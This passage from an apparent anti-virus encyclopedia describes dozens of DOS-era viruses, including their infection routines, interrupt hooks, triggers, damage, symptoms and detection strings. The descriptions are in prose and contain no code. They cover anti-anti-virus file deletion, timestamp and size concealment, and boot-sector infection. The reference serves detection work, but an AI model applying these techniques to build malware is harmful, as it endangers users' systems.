  29459.                  If the file is already corrupted it skips and looks
  29460.                  for another EXE file.
  29461. Virus Memory Type: Non Resident, Direct Infector
  29462. Trigger Condition: Checks for system date. If the day is the 13th of
  29463.                    any month, it will name itself N-XERAM. Otherwise,
  29464.                    it will name itself plainly as XERAM.
  29465.  
  29466. PC Vectors hooked: Int 21h
  29467.  
  29468. Infection Procedure:
  29469. Directly infects *.EXE files when an infected file is executed. Copies
  29470. the virus code to the host program, adding approximately 648 bytes.
  29471. Loads first the virus before running the host program.
  29472.  
  29473. Special note: The virus initially searches for *.COM files. It picks
  29474. COMMAND.COM first, and infects it. After infecting COMMAND.COM,
  29475. the virus searches for *.EXE files. It does not search for *.COM files
  29476. again. It only searches for *.EXE.
  29477.  
  29478. The virus first gets the system date to compare the day (to
  29479. establish the name), then sets DTA. The virus then searches for *.EXE
  29480. files within the directory using Int 21 (4E). When the search is
  29481. successful, the virus gets the file's attribute using Int 21 (43).
  29482. It changes its attribute to enable the write function,
  29483. (especially for the COMMAND.COM). It takes note of the file time and
  29484. date using Int 21 (51) so that when it accomplishes its task of
  29485. altering the code, it can save it using the original file time and
  29486. date. This therefore deceives the user that the file was never been
  29487. changed.
  29488.  
  29489. After the alteration, the virus then protects itself from the following
  29490. anti-virus programs, by deleting it using Int 21 (41):
  29491.  
  29492.            1.  /NCDTREE/NAV_._NO
  29493.            2.  /CHKLIST.MS
  29494.            3.  /SCANVAL.VAL
  29495.  
  29496. These files are virus information or data files used by the respective
  29497. anti-virus programs. We can classify this virus as an anti-anti-virus
  29498. virus.
  29499.  
  29500. *Every time an infected file is executed, one EXE file is infected
  29501. within the same directory.
  29502.  
  29503. Damage:
  29504. 1) Increase in file size, adds approximately 1667-1678 bytes.
  29505. 2) Corrupts COMMAND.COM, making it unusable. Adds 1674 bytes.
  29506.    Infected EXE files run normally.
  29507.  
  29508. Symptom: Delay in program execution due to virus activity.
  29509.  
  29510. [Despro11]
  29511. Virus Type:  Polymorphic, File Virus
  29512. Virus Length: 2,406-2,409 bytes
  29513. Virus Infect Type: .COM and .EXE files
  29514. Virus Re-infect: no
  29515. Virus Memory Type: High memory resident
  29516. Place of Origin:
  29517.  
  29518. PC Vectors Hooked: INT 21h, INT 24h
  29519.  
  29520. Infection Procedure:
  29521. The virus infects .COM and .EXE files. It increases an infected file's
  29522. size by 2,406 bytes for .COM file and 2,409 for .EXE files. The virus
  29523. infects the host file by attaching itself at the end of the file. The
  29524. virus can become memory resident upon loading and executing an
  29525. infected .COM or .EXE file. As a polymorphic virus, it first decrypts
  29526. its code, then the virus allocates space in the high memory starting
  29527. at 9E80:0000. Then it copies its  code there to stay resident. Once
  29528. resident it hooks to INT 21H by pointing its vector to its program
  29529. in the high memory at 9E80:01BC. The virus uses this interrupt to be
  29530. able to attach itself to the loading and executing files using service
  29531. 4BH of the interrupt. During infection it will first hook to INT 24H
  29532. (Critical Error Handler) to disable the error display during a host
  29533. file write error, thus, the infection will not be obvious. Then it
  29534. will search for COMMAND.COM in the root directory of the current drive
  29535. and infect it if it is still not infected. Thus, after the next bootup
  29536. in the same drive, the virus will immediately become resident, infecting
  29537. the executable files that will be loaded in the memory. Then finally,
  29538. it will infect the current file that has been loaded in the memory. The
  29539. virus sometimes cannot attach itself completely to its host file, and
  29540. thus, just corrupting it. There is no payload or trigger.
  29541.  
  29542. Damage: Corrupts COMMAND.COM and executable files which can cause the
  29543. system to hang.
  29544.  
  29545. Symptom:
  29546. Increases the host's file size by 2,409 bytes for .COM file and
  29547. 2,406 bytes for .EXE file.
  29548.  
  29549. [Neuroquila]
  29550. Alias:
  29551. Place of Origin:
  29552. Eff Length: 4622 bytes
  29553. Virus Type: File Virus, Encryption Virus
  29554.  
  29555. General Comments:
  29556. The NEUROQUI virus will decrypt a part of its code at the beginning of
  29557. its execution and will decrypt 4622 bytes. Then it will copy this to
  29558. the OS area 0000:7C00.  Then it will hook INT 1.
  29559.  
  29560. [Keypress-6]
  29561. Virus Type : File Virus
  29562. Other Name :
  29563. Virus Length :
  29564. Place of Origin :
  29565. Virus Memory Type : High Memory Type
  29566.  
  29567. PC Vectors Hooked : Int 21h, Int 1Ch
  29568.  
  29569. Infection Procedure:
  29570. 1) Saves the values of all the registers.
  29571. 2) Loads itself to the high memory, 9FA3:100 loading 1216 bytes.
  29572. 3) Hooks Int 21h and Int 1Ch (Timer Tick Interrupt), sets a value,
  29573.    then returns the original values to the registers.
  29574.  
  29575. [Screaming_Fist]
  29576. Other Name: SFIST696
  29577. Virus Type: File Virus
  29578. Virus Length: Approximately 675 bytes (moves 696 bytes to memory)
  29579. Virus Memory Type: High Memory
  29580. Place of Origin:
  29581.  
  29582. PC Vectors Hooked: Int 21h
  29583.  
  29584. Infection Procedure:
  29585. 1) Loads itself to high memory, loading approximately 2,048 (9F80:0000)
  29586.    bytes.
  29587. 2) Infects *.COM and *.EXE files. Copies the virus code to the host
  29588.    program, adding approximately 696 (02B8H) bytes. Loads first the
  29589.    virus before running the host program.
  29590. 3) While in the memory, the virus infects all executed COM and EXE
  29591.    files.
  29592.  
  29593. The virus code is decrypted. The virus reacts ordinarily by allocating
  29594. space in the memory before infecting files. Nothing extraordinary
  29595. happens. It just attaches its code to the host program after it is
  29596. loaded from the memory.
  29597.  
  29598. Symptom:
  29599. 1) Decrease in free memory.
  29600. 2) Increase in file size.
  29601. 3) May display:
  29602.  
  29603.         "Screaming Fist IIV"
  29604.  
  29605. which appears in the decrypted code.
  29606.  
  29607. Actual recognizable string: "C:\COMMAND>COM.Screaming Fist IIV"
  29608.  
  29609. Detection method: Decrypt the virus code before detection. Check for
  29610. the above strings.
  29611.  
  29612. [PH33R.1332-1]
  29613. Alias:
  29614. Origin :
  29615. Eff Length : 1332 bytes
  29616.  
  29617. Symptoms :
  29618. Increase in file size of EXE, COM, and DLL programs with a size of
  29619. 1332 bytes and decrease of 2672 in available memory.  When in a
  29620. write-protected floppy, it usually displays a "Write Protect
  29621. Error" message when there is an attempt to read from it.
  29622.  
  29623. General Comments:
  29624. On the first infection, this virus will first allocate 2672 bytes in
  29625. the High Memory Area and then transfer 1332 bytes of its code to that
  29626. area.  It will then hook INT 21 with infection procedures to
  29627. services 4B(Execute Program), 6C(Extended Open Create), 56(Rename
  29628. File), and 43(Get File Attributes).
  29629.  
  29630. This virus will infect all EXE, COM, DLL files that are opened,
  29631. renamed, or executed.  It will also avoid files that ends with the
  29632. string "AV" (NAV, TBAV), "AN" (PCSCAN, SCAN) and "DV".
  29633.  
  29634. The virus is named as such because of the string "PH33R" found in the
  29635. virus code.
  29636.  
  29637. [Changsha]
  29638. Virus Type:  Parasitic, File Virus
  29639. Virus Length: 3,072-3,091 bytes
  29640. Virus Infect Type: .COM and .EXE files
  29641. Trigger Condition: Sunday
  29642. Virus Re-infect: no
  29643. Discovery Date: 1991
  29644. Virus Memory Type: Memory resident, MCB type
  29645. Place of Origin: Changsha China
  29646.  
  29647. PC Vectors Hooked: INT 8h, INT 13h, INT 21h
  29648.  
  29649. Infection Procedure:
  29650. The virus infects both .COM and .EXE files. It increases the infected
  29651. file's size by 3,072 for .COM and 3,091 for .EXE. It infects its host
  29652. by attaching itself at the end of the file. The virus allocates its
  29653. memory resident code in the low memory after the DOS resident programs.
  29654. The virus code will become memory resident upon loading, executing,
  29655. and copying an infected file. While resident in the memory it can
  29656. infect executable files by doing the same. It hooks INT 21H by
  29657. pointing its vector to its program in the low memory at 17F8:01C0. A
  29658. hook to this interrupt will enable the virus to attach itself to the
  29659. host. It also hooks INT 8H (changed to 17F8:02E1) and INT 13H (changed
  29660. to 17F8:0BED) but the payload is not seen.
  29661.  
  29662. In its hook to INT 21H it gets the current date and if the current day
  29663. is Sunday, it will load itself and infect all the executable files in
  29664. the current directory. It will be noticed that the date and time
  29665. attributes of infected files at this day will be set to 1-1-94 and
  29666. 1:15a. The infected files at this day will also be corrupted and will
  29667. not run properly. Other than Sunday the virus will just replicate
  29668. itself to the file. If checked from DOS CHKDSK.EXE the memory
  29669. occupied by the virus is 3,344 bytes. The following text strings can
  29670. be seen inside the virus code:
  29671.  
  29672.            "Auto-Copy Deluxe R3.00"
  29673.            "(C) Copyright 1991. Mr YaQi. Changsha China"
  29674.            "No one can Beyond me!"
  29675.  
  29676. Damage: Corrupts COM and EXE files.
  29677.  
  29678. Symptom:
  29679. 1) Increases the host's file size by 3,072-3,091 bytes.
  29680. 2) Sets the time and date attributes to 1-1-94, 1:15a.
  29681.  
  29682. [Chao.1241]
  29683. Virus Type:  Parasitic, File Virus
  29684. Virus Length: 1,241-1,247 bytes
  29685. Original Name: CHAOS
  29686. Virus Infect Type: .COM and .EXE files
  29687. Virus Re-infect: no
  29688. Virus Memory Type: Memory resident, MCB type
  29689. Place of Origin:
  29690.  
  29691. PC Vectors Hooked: INT 21h, INT 13h, INT 24h
  29692.  
  29693. Infection Procedure:
  29694. The virus infects both .COM and .EXE files. It can become memory
  29695. resident upon loading and executing an infected file. It increases
  29696. the size of an infected file by 1,241 bytes for .COM file and
  29697. 1,247 bytes for .EXE file.
  29698.  
  29699. Upon activation the virus stays resident in the low memory, after
  29700. the DOS resident programs. It hooks INT 21H by pointing its vector
  29701. to its program in the low memory at 1808:020E to enable it to attach
  29702. to executing files using the 4BH service of the interrupt. It also
  29703. hooks INT 24H (Critical Error Handler) to disable the error message
  29704. display during a host file write error. After the virus has loaded
  29705. itself in the memory it first checks the current date. If it is
  29706. September 13 the payload will be executed. The following trigger
  29707. dates were also seen:
  29708.  
  29709.     Every 9th  day of 1997
  29710.      "   10th  "  "  1998
  29711.      "   11th  "  "  1999 .... and so on
  29712.  
  29713. The following formula describes how to determine the trigger day for
  29714. the current year:
  29715.  
  29716.     Trigger Day = (Current Year - 1988)
  29717.  
  29718. The payload executed by the virus during the date of trigger just hangs
  29719. the system after infecting the loading and executing file. It then
  29720. clears the screen and displays:
  29721.  
  29722.   "I see, I come, I conquer...Trojan horse - CHAOS v2.0 by
  29723.    Faust".
  29724.  
  29725. The virus occupies 1,840 bytes of the memory as checked using DOS
  29726. CHKDSK.
  29727.  
  29728. Damage: Hangs the system.
  29729.  
  29730. Symptom: Infected files increase by 1,241 for .COM and 1,247 for .EXE.
  29731.  
  29732. [Chill]
  29733. Virus Type:  Polymorphic, File Virus
  29734. Virus Length: 544 bytes
  29735. Virus Infect Type: .COM files
  29736. Virus Re-infect: no
  29737. Virus Memory Type: High memory resident
  29738. Place of Origin:
  29739.  
  29740. PC Vectors Hooked: INT 21h
  29741.  
  29742. Infection Procedure:
  29743. The virus only infects .COM files. It increases an infected file's size
  29744. by 544 bytes. The virus infects the host file by attaching itself at the
  29745. end of the file. As a polymorphic virus, it first decrypts its 544 bytes
  29746. code using XOR 6AH to each byte. Then the virus allocates 1200 bytes in
  29747. the high memory (9FB4:0000) and copies its code there to stay resident.
  29748. Then it hooks INT 21H by changing its vector to point to its program in
  29749. the high memory (9FB4:00B9). The virus will become memory resident upon
  29750. loading and execution of an infected file. Once it has become resident
  29751. it will infect other .COM files when it is loaded and executed because
  29752. it uses the altered service 4BH of INT 21H which first attaches the
  29753. virus code into the host file before giving control to the host. It
  29754. also sets the date attribute of the infected file to 01-01-94.
  29755.  
  29756. Damage: None
  29757.  
  29758. Symptom: Increases the host's file size by 544 bytes.
  29759.  
  29760. [Three_Tunes]
  29761. Virus Type:
  29762. Virus Length: Approximately 1784 bytes
  29763. Virus Re-infect: Does not re-infect, infected file size is consistent
  29764. Virus Memory Type: High Memory
  29765. Place of Origin:
  29766.  
  29767. PC Vectors Hooked: Int 21h, Int 1Ch
  29768.  
  29769. Infection Procedure:
  29770. 1) Loads itself to high memory, allocating 2304 bytes (9F70:0000).
  29771. 2) Infects *.EXE files. Copies the virus code to the host program,
  29772.    adding approximately 1784 bytes. Loads first the virus before
  29773.    running the host program.
  29774.  
  29775. While memory resident, the virus infects any executed *.EXE files.
  29776. It does not do anything special. It just replicates when it is resident
  29777. in the memory. Only infects executed files.
  29778.  
  29779. Damage:
  29780. 1) Free memory decreases by approximately 2304 bytes.
  29781. 2) Increase in file size. Adds approximately 1784 bytes.
  29782.  
  29783. Note:
  29784. The virus checks first if the current month is June using Int 21 (2A).
  29785. If it is, it triggers the virus code; otherwise, it just exits the
  29786. program. Then, the virus checks for the system time using Int 21 (2C).
  29787. It uses a special formula that is used to select which payload to
  29788. execute. There are 4 possible payloads which will be discussed later.
  29789. But first, the formula:
  29790.  
  29791.            Int 21 (2C):
  29792.            Significant register CX,
  29793.            Adds CH to CL and returns the sum to CL (Add CL,CH)
  29794.            uses the AND boolean between CL,03      (And CL,03)
  29795.            clears CH to 00                         (XOR CH,CH)
  29796.            compares Cl to 4 possibilities          (CMP CL,+03)
  29797.  
  29798. The virus uses this procedure to get 00, 01, 02, 03 as values for CL.
  29799. Each value corresponds to a certain tune. (03 doesn't have a tune to
  29800. play) When the infected file is run, a specific tune depending on the
  29801. time and the result after manipulating the time is played. A total of
  29802. three tunes are played. Whatever tune is played, infection remains
  29803. the same, even if it plays nothing.
  29804.  
  29805. Symptom:
  29806. 1) Delay in program execution due to virus activity.
  29807. 2) Plays various tunes.
  29808.  
  29809. [Phx.965]
  29810. Alias:
  29811. Origin:
  29812. Eff Length: 965-968 bytes
  29813. Virus Type:
  29814.  
  29815. Symptoms:
  29816. Infected EXE and COM files increase by 965-968 bytes and
  29817. there is a decrease of 1024 in the available memory.  When in
  29818. a write-protected floppy, it usually displays a "Write Protect
  29819. Error" message when an attempt to read it is made.
  29820.  
  29821. General Comments:
  29822. On the first infection, this virus will first allocate 1024 bytes in
  29823. the High Memory Area and then transfer 965 bytes of its code to that
  29824. area.  It will then hook INT 21 with infection procedures to
  29825. services 4B00(Execute Program), 3D02(Open File Handle), and 40(Write
  29826. to File/Device).
  29827.  
  29828. This virus will infect all EXE and COM files that are opened, renamed,
  29829. or executed.
  29830.  
  29831. The virus is named as such because of the string "PHX" on the virus
  29832. code.
  29833.  
  29834. [HI.460]
  29835. Virus Type: File Virus
  29836. Other Name:
  29837. Virus Length:
  29838. Virus Infect Type: EXE files
  29839. Place of Origin:
  29840. Virus Memory Type: High Memory Type
  29841.  
  29842. PC Vectors Hooked: Int 21h
  29843.  
  29844. Infection Procedure:
  29845. 1) Checks if the value stored in DS:[0164] is 2ED3h (if 2ED3h is not
  29846.    moved to that address).
  29847. 2) Loads itself in the high memory in address 9FC0:0h.
  29848. 3) Hooks interrupt 21h, then sets it. Once in the memory, the virus
  29849.    waits for an EXE file to be executed to infect it. A word "Hi"
  29850.    can be found in the virus code for every infected EXE file.
  29851.  
  29852. [Liberty.2857.A]
  29853. Virus Type: File Virus
  29854. Other Name:
  29855. Virus Length:
  29856. Place of Origin:
  29857. Virus Memory Type: High Memory type
  29858.  
  29859. PC Vectors Hooked: Int 21h
  29860.  
  29861. Infection Procedure:
  29862. 1) Loads itself from 11B0:0110 to 9DEE:0110h, with 2858 bytes.
  29863. 2) Encrypts the data from 11B0:[0115] with CX value = 3Ch. In this,
  29864.    "LIBERTY" can be found but after encrypting it the data in that
  29865.    address will become "Me BC.".
  29866. 3) Encrypts the message again from 11B0:0113h to 114C:0100h and produces:
  29867.    "- M Y S T I C - COPYRIGHT (c) 1989-2000, by SsAsMsUsEsL"
  29868. 4) After it is loaded in the high memory, it waits for an EXE
  29869.    or COM file to be executed to infect it.
  29870.  
  29871. [Sibylle.853]
  29872. Virus Type: File Virus
  29873. Virus Length: Approximately 867 bytes
  29874. Virus Memory Type: High Memory
  29875. Place of Origin:
  29876. Trigger Condition: Activates only if the millionth of a second is
  29877.                    less than 32. If not, then it just exits the code
  29878.                    without loading itself to the memory.
  29879.  
  29880. PC Vectors Hooked: Int 21h, Int 2Fh
  29881.  
  29882. Infection Procedure:
  29883. 1) Loads itself to high memory, allocating 928 bytes (using MEM).
  29884. 2) Moves 904 (01C4H x 2) bytes to high memory.
  29885. 3) Infects *.EXE files. Copies the virus code to the host program,
  29886.    adding approximately 867 bytes. Loads first the virus before
  29887.    running the host program.
  29888.  
  29889. While memory resident, the virus infects any executed *.EXE files.
  29890. It does not do anything special. It just replicates when it is resident
  29891. in the memory. Only infects executed files.
  29892.  
  29893. Damage:
  29894. 1) Free memory decreases by approximately 928 bytes.
  29895.    Using MEM.EXE, 928 bytes will be used by MSDOS (tricky).
  29896. 2) Increase in file size. Adds approximately 867 bytes.
  29897.  
  29898. Symptom: Delay in program execution due to virus activity.
  29899.  
  29900. Detection method: Locate the virus text strings.
  29901.  
  29902. [Fich-1]
  29903. Virus Type: File Virus
  29904. Other Name:
  29905. Virus Length:
  29906. Virus Infect Type: COM files (including COMMAND.COM)
  29907. Place of Origin:
  29908. Virus Memory Type: MCB Type
  29909.  
  29910. PC Vectors Hooked: Int 21h
  29911.  
  29912. Infection Procedure:
  29913. The virus is a TSR program. After the virus is executed
  29914. it immediately infects COMMAND.COM. Then it
  29915. waits for another file to be executed to infect it. This
  29916. virus only infects COM files. When one uninfected file
  29917. is executed another COM file gets infected.
  29918. Also, the virus doesn't re-infect files. Before the virus
  29919. loads itself to the memory, it checks first whether the virus
  29920. is already memory resident.
  29921.  
  29922. Note: The virus makes a smart move by hooking Int 1 and 3 to
  29923. fool the one debugging it.
  29924.  
  29925. [Hdenowt]
  29926. Virus Type: File Virus
  29927. Other Name:
  29928. Virus Length:
  29929. Virus Infect Type: COM and EXE files (including COMMAND.COM)
  29930. Place of Origin:
  29931.  
  29932. PC Vectors Hooked: Int 21h
  29933.  
  29934. Infection Procedure:
  29935. 1) Saves the first 16 bytes to address 114C:08D5h and
  29936.    later changes the first 16 bytes at 0:0 from 11BA:0285h. But
  29937.    before changing, an encryption occurs starting in 11BA:012Eh by
  29938.    XORing it to 95h, 288 bytes.
  29939. 2) When the virus code is executed, it locates COMMAND.COM,
  29940.    then it searches for other COM and EXE files in the same
  29941.    directory where the virus is executed. The infection can't
  29942.    be easily be seen because the size of the file is still the
  29943.    same.
  29944.  
  29945. Symptom: Infected files increase by approximately 1700 bytes.
  29946.  
  29947. [Kacz]
  29948. Origin:
  29949. Eff Length: 4444 bytes
  29950. Virus Type: Polymorphic File Virus
  29951.  
  29952. Symptoms :
  29953. EXE files increase by 4444 bytes and there is a decrease
  29954. of 6144 bytes in the available memory. Infected files tend to
  29955. display messages like: "Error Loading Program File", "File not
  29956. Found", and "Memory Allocation Error."
  29957.  
  29958. General Comments:
  29959. On the first infection, KACZ first decrypts 4387 bytes of its
  29960. code and then allocates 6144 bytes in the High Memory
  29961. Area. It then transfers 4387 bytes of its code to that area.
  29962. It then hooks INT 13 and INT 21. Then reads the Boot Record of the hard
  29963. disk and tries to modify it. It writes the new infected Boot Record on
  29964. the hard disk so every time it is used for booting up the virus will be
  29965. memory resident.
  29966.  
  29967. This virus will infect all EXE files that are opened, renamed,
  29968. or executed.  It will also change the file's Second field to 62.
  29969.  
  29970. These messages are found in the decrypted virus code:
  29971.  
  29972.            "Zrobione"
  29973.            "Wersja"
  29974.            "Kodowanie"
  29975.            "Liczmik HD"
  29976.            "K a c z,o r t e s t"
  29977.  
  29978.  
  29979. [V-BCIV-1]
  29980. Other Name: VIENREBO
  29981. Virus Type: File Virus
  29982. Virus Length: Approximately 648 bytes
  29983. Virus Re-infect: Does not re-infect, infected file size is consistent.
  29984.                  If the file is already corrupted it skips and looks
  29985.                  for another COM file.
  29986. Virus Memory Type: Non Resident, Direct Infector
  29987. Place of Origin:
  29988.  
  29989. PC Vectors Hooked: Int 21h
  29990.  
  29991. Infection Procedure:
  29992. Directly infects *.COM files when an infected file is executed. Copies
  29993. the virus code to the host program, adding approximately 648 bytes.
  29994. Loads the virus first before running the host program.
  29995.  
  29996. The virus first gets and sets DTA for transfer purposes.
  29997. The virus then searches for *.COM files within the directory using
  29998. Int 21 (4E and 4F). If the search is successful, the virus gets the
  29999. file's attribute using Int 21 (43). It changes its attribute to enable
  30000. the write function (especially for the COMMAND.COM). It takes note of
  30001. the file time and date using Int 21 (51) so that when it accomplishes
  30002. its task of altering the code, it can save the file using the original
  30003. file time and date. This therefore deceives the user that the file was
  30004. never been changed.
  30005.  
  30006. Every time an infected file is executed, one COM file is infected
  30007. within the same directory.
  30008.  
  30009. Damage:
  30010. 1) Increase in file size. Adds approximately 648 bytes.
  30011. 2) Corrupts COMMAND.COM, making it unusable. Other COM files run
  30012.    normally.
  30013.  
  30014. Symptom: Delay in program execution due to virus activity.
  30015.  
  30016. [Nightfall.4518]
  30017. Origin:
  30018. Eff Length:
  30019. Virus Type: File Virus
  30020.  
  30021. General Comments:
  30022. 1) Decrypts a part of its code with a size of 4526 bytes and then
  30023.    decrypts it again.
  30024. 2) Checks if it is already loaded in the memory by checking the
  30025.    interrupt vectors of INT 13, INT 21 and INT 2A.
  30026. 3) Allocates 5680 bytes in the High Memory Area.
  30027.  
  30028. After loading itself resident in the High Memory Area, the virus seems
  30029. to be doing nothing. It is possible that the virus has some bugs.
  30030.  
  30031. [Dig.Death.3787]
  30032. Virus Type: Polymorphic, File Virus
  30033. Virus Length: 3,547 bytes
  30034. Virus Infect Type: .COM and .EXE file
  30035. Virus Re-infect: No
  30036. Virus Memory Type: High memory resident
  30037. Place of Origin:
  30038.  
  30039. PC Vectors Hooked: INT 21h, INT 13h, INT 1Ch
  30040.  
  30041. Infection Procedure:
  30042. The virus infects both .EXE and .COM files. It infects its host file by
  30043. attaching itself at the end of the file. It increases an infected
  30044. file's size by 3,547 bytes. The virus can become memory resident upon
  30045. loading and executing an infected file. As a polymorphic virus it
  30046. first decrypts 3,422 bytes of its code. Then it allocates 5,120 bytes
  30047. in the high memory starting at 9EB0:0000. From there it hooks to INT
  30048. 21H by pointing its vector to its program in the high memory. It uses
  30049. service 4BH of the interrupt to be able to attach itself to loading and
  30050. executing files. It also uses service 4EH and 4FH to hide the actual
  30051. increase in the sizes of the infected files once the virus has become
  30052. memory resident; thus, the infection is unnoticeable. Once the virus
  30053. has attached itself to the host file the virus encrypts its code again
  30054. and writes it to a new file. No payload or trigger was seen. The virus
  30055. just replicates itself to .COM and .EXE files.
  30056.  
  30057. Symptom: Infected files increase by 3,547 bytes.
  30058.  
  30059. [Vinchuca]
  30060. Virus Type: File Virus
  30061. Virus Length: Encrypted code size is 912 bytes
  30062. Virus Memory Type: High Memory
  30063. Place of Origin:
  30064.  
  30065. PC Vectors Hooked: Int 21h, Int 27h
  30066.  
  30067. Infection Procedure:
  30068. 1) Loads itself to high memory, loading approximately 1328 bytes.
  30069. 2) Infects *.COM files. Copies the virus code to the host program
  30070.    (code size is 912 bytes). Loads the virus first before running
  30071.    the host program.
  30072. 3) While memory resident, the virus infects all COM files that are
  30073.    opened.
  30074.  
  30075. The virus code is transferred to the allocated memory space using Int
  30076. 21 (4A). The actual virus code is immediately executed upon meeting
  30077. the requirements.
  30078.  
  30079. The virus is TSR, using Int 27. Basically, the virus reacts by
  30080. transferring its code to the high memory before actually attaching it
  30081. to the code itself.
  30082.  
  30083. Symptom: May display
  30084.  
  30085.     "Saludos para Satanic Brain y Patoruzi"
  30086.     "Virus Vinchaca v.1,0 1993"
  30087.     "Creado por Murdock."
  30088.     "Buenos Aires, Argentina"
  30089.     "Su PC tiene mal chagas....jajaja...."
  30090.  
  30091. which appears in the virus code.
  30092.  
  30093. Detection method: Decrypt the virus code before detection. Look for
  30094. the above strings.
  30095.  
  30096. Note: The virus code contains Int 13 (16) which tests for the disk
  30097. change information.
  30098.  
  30099. [Ginger.2774]
  30100. Virus Type: File Virus
  30101. Other Name:
  30102. Virus Length:
  30103. Place of Origin:
  30104. Virus Memory Type: OS Memory Type (after rebooting=High Mem)
  30105.  
  30106. PC Vectors Hooked: Int 21h, Int 13h
  30107.  
  30108. Infection Procedure:
  30109. The virus is an OS type, hooking Int 13 and 21h.
  30110. The virus infects the boot record first, so when the
  30111. machine is reset, the virus will be loaded in the high
  30112. memory. From there it infects files. It allocates 4096 bytes
  30113. in the memory.
  30114.  
  30115. The problem is whenever the virus is executed and the
  30116. machine is reset, after rebooting, the keyboard
  30117. doesn't work due to the use of Int 15h. Because of this
  30118. no infection will occur.
  30119.  
  30120. [Mirea.1788]
  30121. Alias:
  30122. Origin:
  30123. Eff Length: 1788 bytes
  30124. Virus Type: File Virus (COM files)
  30125.  
  30126. Symptoms :
  30127. COM files will increase by 1788 bytes, and there will be a decrease
  30128. of 2368 bytes in the available memory. Execution of running programs
  30129. will slow down.
  30130.  
  30131. General Comments:
  30132. The MIRE1788 virus first allocates memory with a size of 2368 bytes
  30133. and then transfers its virus code to the High Memory Area with a size
  30134. of 1788 bytes. It will then check the date if the day is 13. And
  30135. then it will hook INT 8, INT 9 and INT 21. This allows the virus to
  30136. infect other .COM files.
  30137.  
  30138. If the day of the month is 13, the virus is memory resident and the
  30139. keyboard has not been pressed for 30 minutes, the virus will
  30140. display a red dialog box at the center of the screen with ASCII text
  30141. written on it. The only readable characters are the numbers 16 and
  30142. a set of numbers 133-20-60.
  30143.  
  30144. It also hides an infected file when a DIR at the command prompt is
  30145. executed so as to hide the increase in the size of the infected
  30146. file.
  30147.  
  30148. [Little-Red]
  30149. Virus Type: File Virus
  30150. Virus Length: 1465 bytes
  30151. Virus Infect Type:  n/a
  30152. Trigger Condition: Year < 1994, Date = Sept. 9, Dec. 26
  30153. Virus Re-infect:  n/a
  30154. Virus Memory Type: High Memory Resident
  30155. Place of Origin:
  30156.  
  30157. PC Vectors Hooked:  INT 1Ch, INT 21h, INT 24h
  30158.  
  30159. Infection Procedure:
  30160. 1) Decrypts a part of its code and then executes it which turns out to
  30161.    be a "Get DOS Version" function. The virus uses this function
  30162.    because it directly controls DOS' resources.
  30163. 2) Encrypts this part again.
  30164. 3) Modifies the Allocated Memory and allocates 2048 bytes in the High
  30165.    Memory Area. It is now ready to transfer the virus code into HMA
  30166.    with a size of 1465 bytes.
  30167. 4) In the high memory area, the virus hooks INT 1C, 21 and 24.
  30168. 5) Opens the file being executed and checks if it is a .COM file; if it
  30169.    is, it checks if the file is already infected; if not, the virus
  30170.    infects it. After infection, the virus changes the attribute of
  30171.    "C:\COMMAND.COM" from "read-only" and "system" to "archive".
  30172.  
  30173. [Civil_defense_FB]
  30174. Virus Type:  Boot, File Virus
  30175. Virus Length: 6656 bytes
  30176. Original Name: CIVIL DEFENSE
  30177. Virus Infect Type: .COM and .EXE files
  30178. Virus Re-infect: no
  30179. Virus Memory Type: Non-memory resident
  30180. Place of Origin:
  30181.  
  30182. Infection Procedure:
  30183. The virus primarily infects the Master Boot Sector of drive C:\. It
  30184. first reads the boot sector of drive C:\ and the following sector
  30185. (head 0, cylinder 0, sector 2) in its program. Then it reads 1
  30186. sector from head 0, cylinder 87, sector 65 of drive C:\. The virus
  30187. sets this up by copying other data from the original boot record, and
  30188. then writes this to the boot sector of drive C:\; thus, replacing the
  30189. original one. Then it copies its 6,656 bytes code (13 sectors) to
  30190. sector 66, cylinder 87, head 0 of drive C:\.
  30191.  
  30192. During the analysis it was seen that it infected the virus program file
  30193. CIV6672.EXE by opening it, copying its own header to the file, moving
  30194. the file pointer to the end of the host file (CIV6672.EXE), and then
  30195. performing INT 40H (Write to file) with the size of memory to write
  30196. equals 0 (CX=0000). Thus, it just corrupts the virus program file. It
  30197. was not seen how the infected boot sector loads its program from sector
  30198. 66, cylinder 87, head 0 of drive C:\ which may be the reason why the
  30199. infected boot sector doesn't infect the loaded and executed files.
  30200.  
  30201. There was also no interrupt hook, memory allocation to make it resident,
  30202. and trigger seen. As verified from DOS CHKDSK, there was no change in
  30203. the memory allocation after loading the virus program CIV6672.EXE.
  30204. Therefore, it was concluded that the virus infects the boot sector by
  30205. directly running the virus program file without knowing how the virus
  30206. can replicate itself in other executable files that can infect the
  30207. Master Boot Sector of drive C:\ upon loading and execution of the
  30208. files.
  30209.  
  30210. Symptom: Slows down the file loading and execution time.
  30211.  
  30212. [Plagiarist.2051]
  30213. Alias: PLAGIARIST
  30214. Origin:
  30215. Eff Length: 2051 bytes
  30216. Virus Type: Multi-partite Virus
  30217.  
  30218. Symptoms :
  30219. EXE and COM files increase by 2051 bytes and there is a decrease of
  30220. 2048 bytes in the available memory.
  30221.  
  30222. General Comments:
  30223. On the first infection, the virus checks if the date is between 1993
  30224. and 2042. If this is the case, it makes a copy of the boot
  30225. record at the logical end of the drive and transfers its code
  30226. right after the boot record.  Then it replaces the current boot
  30227. record with its own infected boot record.  The virus will not activate
  30228. at this time. It will activate when you boot from the infected drive.
  30229.  
  30230. The virus allocates 2048 bytes in the high memory and transfers the
  30231. virus code in the disk to the High Memory Area. Afterwards it hooks
  30232. INT 21, INT 28, INT 08, and INT 13.
  30233.  
  30234. [VLamiX]
  30235. Virus Type: File Virus
  30236. Virus Length: Approximately 1062 bytes
  30237. Virus Memory Type: High Memory
  30238. Place of Origin:
  30239.  
  30240. PC Vectors Hooked: Int 21h, Int 10h
  30241.  
  30242. Infection Procedure:
  30243. 1) Loads itself onto the high memory, allocating approximately 1,136
  30244.    bytes.
  30245. 2) Infects *.EXE files. Copies the virus code to the host program,
  30246.    adding approximately 1091-1106 bytes. Loads the virus first before
  30247.    running the host program.
  30248. 3) While memory resident, the virus infects all opened EXE files.
  30249.  
  30250. The virus code is decrypted. The virus reacts ordinarily by allocating
  30251. space in the memory before infecting files. Nothing extraordinary
  30252. happens. It just attaches its code to the host program.
  30253.  
  30254. Symptom: May display
  30255.  
  30256.      "Smartc*.cps chklist*"
  30257.      "-=* Die-lamer *=-"
  30258.      "chklist ???"
  30259.      "chklist.cps"
  30260.      "Vlamix-1"
  30261.  
  30262. which appears in the decrypted code.
  30263.  
  30264. Detection method: Decrypt the virus code before detection. Look for
  30265. the above strings.
  30266.  
  30267. [Sleepwalker]
  30268. Virus Type: File Virus
